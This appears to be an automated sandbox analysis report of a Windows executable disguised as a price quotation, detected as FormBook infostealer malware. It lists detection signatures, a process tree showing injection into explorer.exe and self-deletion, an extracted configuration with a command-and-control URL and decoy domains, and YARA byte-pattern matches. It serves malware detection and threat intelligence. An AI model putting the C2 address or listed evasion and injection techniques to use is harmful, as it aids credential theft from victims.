Play interactive tour

Edit tour

Windows Analysis Report PRICE_REQUEST_QUOTATION.exe

Overview

General Information

Sample Name:	PRICE_REQUEST_QUOTATION.exe
Analysis ID:	491948
MD5:	85589170af713a03ca622f94429c634a
SHA1:	4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
SHA256:	dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
Tags:	exexloader
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

PRICE_REQUEST_QUOTATION.exe (PID: 3952 cmdline: 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' MD5: 85589170AF713A03CA622F94429C634A)

PRICE_REQUEST_QUOTATION.exe (PID: 4684 cmdline: 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' MD5: 85589170AF713A03CA622F94429C634A)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autoconv.exe (PID: 4484 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

wscript.exe (PID: 4960 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 4860 cmdline: /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ac9:$sqlite3step: 68 34 1C 7B E1 0x6bdc:$sqlite3step: 68 34 1C 7B E1 0x6af8:$sqlite3text: 68 38 2A 90 C5 0x6c1d:$sqlite3text: 68 38 2A 90 C5 0x6b0b:$sqlite3blob: 68 53 D8 7F 8C 0x6c33:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cc9:$sqlite3step: 68 34 1C 7B E1 0x15ddc:$sqlite3step: 68 34 1C 7B E1 0x15cf8:$sqlite3text: 68 38 2A 90 C5 0x15e1d:$sqlite3text: 68 38 2A 90 C5 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp

